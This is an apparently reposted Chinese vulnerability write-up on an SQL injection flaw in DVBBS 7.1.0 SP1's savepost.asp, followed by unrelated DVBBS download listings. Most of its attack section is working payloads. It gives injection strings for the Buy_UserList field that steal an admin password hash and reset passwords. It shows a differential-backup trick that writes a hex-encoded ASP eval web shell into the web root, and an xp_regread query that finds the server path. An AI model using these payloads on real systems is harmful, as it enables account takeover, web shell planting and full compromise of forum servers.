<!----> 动网论坛(DVBBS 7.1.0 SP1)Savepost.asp存在严重漏洞10-May-06 发现:Bug.Center.Team 严重程度:严重 厂商名称:动网论坛(DVBBS) 程序版本:DVBBS 7.1.0 SP1
漏洞分析: 因为程序在savepost.asp文件中变量过滤不严,导致数据库处理产生漏洞,可以取得论坛所有权限以及webshell。已经提交官方审核,并通过确认,补丁已经公布
厂商补丁: http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1
看到下面: ------------------------------ If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0 If Buy_UserList<>"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","") ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||" GetMoneyType = 3 'UseTools = ToolsInfo(4) ------------------------------------
再朝下看: Public Sub Insert_To_Announce() '插入回复表 DIM UbblistBody UbblistBody = Content UbblistBody = Ubblist(Content) SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")" Dvbbs.Execute(sql)
可以看到Buy_UserList这个变量过滤有问题,呵呵,这个变量又导致ToolsBuyUser这个变量有问题。的确是可以注射,呵呵。 在悔过头来看补丁里面: insert里面有修补:&dvbbs.checkstr(ToolsBuyUser)&" 看来应该是这个地方了。 利用起来最好是sql版本,可以updata改管理员密码,或者差异备份得shell。 利用办法嘛,先注册一个id,找个版面发帖子, 帖子内容下面有个选择帖子类型。 选择---论坛交易币设置。 下面是表单内容。
看源代码: ------------------------------------- <option value="">选择帖子类型</option> <option value="0">赠送金币贴</option> <option value="1">获赠金币贴</option> <option value="2">论坛交易帖设置</option> </select> 金币数量:<input name="ToMoney" size="4" value=""> <div id="Buy_setting" style="display:none"> 购买数量限制:<input name="Buy_Orders" size="4" value="-1">(设置为“-1”则不限制)<BR> VIP用户浏览选项:不需要购买<INPUT TYPE="radio" NAME="Buy_VIPType" value="0" checked="checked">,需要购买<input type="radio" name="Buy_VIPType" value="1" /><br /> 可购买用户名单限制:<input name="Buy_UserList" size="30" value="" />(每个用户名用英文逗号“,”分隔符分开,注意区分大小写) </div> ------------------------------------- 就是这个地方了,hoho。 下面有个“可购买名单限制”,里面就填写: xjy111',0);update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='yellowcat')/**/where[UserName]='qq156544632';--
提交成功。 看看我的Email。 晕死,居然成了空白。不知道为什么哈。 来点直接的:
coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='qq156544632';-- 这回好了,先退出,用admin888这个密码直接成功登录。 好了,语句没有问题,大家现在可以自由发挥,会写工具的,吧delphi什么的搬出来。 直接改管理员的密码进后台,可以恢复数据库的办法得到shell(参考angel的文章,dvbbs7.1sql版本依然可以吧) 或者差异备份(后台可以看到web绝对路径):
create table aspshell (str image);
declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.bak;
insert into aspshell values(0x3C256576616C20726571756573742822232229253E); declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.asp' with differential;
drop table aspshell;
另外一种得到web绝对路径办法(从职业欠钱兄弟那里看到的) create table regread(a varchar(255),b varchar(255)); (建立一个临时表,存放读取到的信息) insert regread exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/' (使用xp_regread这个函数读取注册表信息得到虚拟目录路径,并存入临时表中) update dv_boke_user set boketitle=(select top 1 b from regread) where bokename='admin'
至于acess版本没有研究。
[至于工具,实在没必要写,因为利用起来很简单,把所利用的注入语句复制粘贴一下就可以了。对于动网SQL版,我感觉危害比当初的上传漏洞还要严重,因为操作起来很方便。希望大家本着一种学习技术的心态,不要对存在漏洞的站点实施破坏攻击!!!—— http://aliwy.77169.com <!----> |
相关推荐
ASP实例开发源码—活跃度插件 V2.0 Beta1 For DVBBS7.1_SP1.zip ASP实例开发源码—活跃度插件 V2.0 Beta1 For DVBBS7.1_SP1.zip ASP实例开发源码—活跃度插件 V2.0 Beta1 For DVBBS7.1_SP1.zip
运行环境: Windows2000以上,需安装.net Framework http://download.pchome.net/php/dl.php?sid=12854 (用网际快车下载) 转换完成后所有用户为普通会员,请用 admin admin888 登陆管理,重计论坛各项数据...
for DVBBS7.1 版主评定1.0(带自动工资、请假、参数设置)纯绿色插件 插件修改自dv7.0版主评定2.1 由打火机修改,不存在版权问题,敬请随意传播 ---------------- 功能: ---------------- ...
ASP源码—活跃度插件 V2.0 Beta1 For DVBBS7.1_SP1.zip
解决非商业版本1的问题!非官方的储存过程也可以为1对SQL查询进行优化!增加储存过程至8个!使论坛速度高速提升
基于ASP的活跃度插件 V2.0 Beta1 For DVBBS7.1_SP1.zip
操作说明,请仔细阅读操作说明后进行操作: 1、请把压缩包中的key.asp文件上传到Dvbbs7.1论坛目录下。 2、运行key.asp后选择您所需要的选项。 3、注意:使用完毕后请点击“删除文件”或在FTP...
商业版本 动网论坛7.1sp1 Mssql 商业版_Sql.exe
程序内核:2005年7月10日 DvBBS v7.1.0,美化修改说明: (1)安装了"蓝色心情"风格和"我为她狂"风格 (2)去除修改个人资料页面底部的空白 (3)去除发帖页面底部的空白 内置114张100*100的精美论坛头像 默认管理员:Admin ...
本论坛是根据动网论坛dvbbs 7.1修改的,增加了许多插件,欢迎大家使用 增加插件: 1.增加魔法表情 2.增加近70个头像 3.增加社区明星 4.增加结婚礼堂 5.增加点歌中心 6.增加许愿版 7.增加动漫钱庄 8.增加社区法院 9....
ASP源码,压缩包解压密码:www.cqlsoft.com
基于DVBBS7.1修改而成,增加了市面上大部分的插件,并进行了一些美化修改。功能多多。
DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码)_dvbbstozforums
程序修改:beesea本论坛是根据动网论坛dvbbs 7.1修改的,增加了许多插件,欢迎大家使用用户名:admin 密码:admin888增加插件:1.增加魔法表情2.增加近70个头像3.增加社区明星4.增加结婚礼堂5.增加点歌中心6.增加许愿...
DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码)_C#论坛社区程序
ASP.NET-[论坛社区]DVbbs7.1转ZFORUMSV4.1转换工具(含源码).zip
ASP.NET源码——[论坛社区]DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码).zip
动网论坛程序7.1版,已测试 动网论坛作为60%的论坛使用率,绝对有其好处,虽然传言其漏洞多,但是事实他很好用
本插件在系统原有的几种标题醒目方式上新增“跳跃醒目”、“霓虹醒目”和“突出醒目”。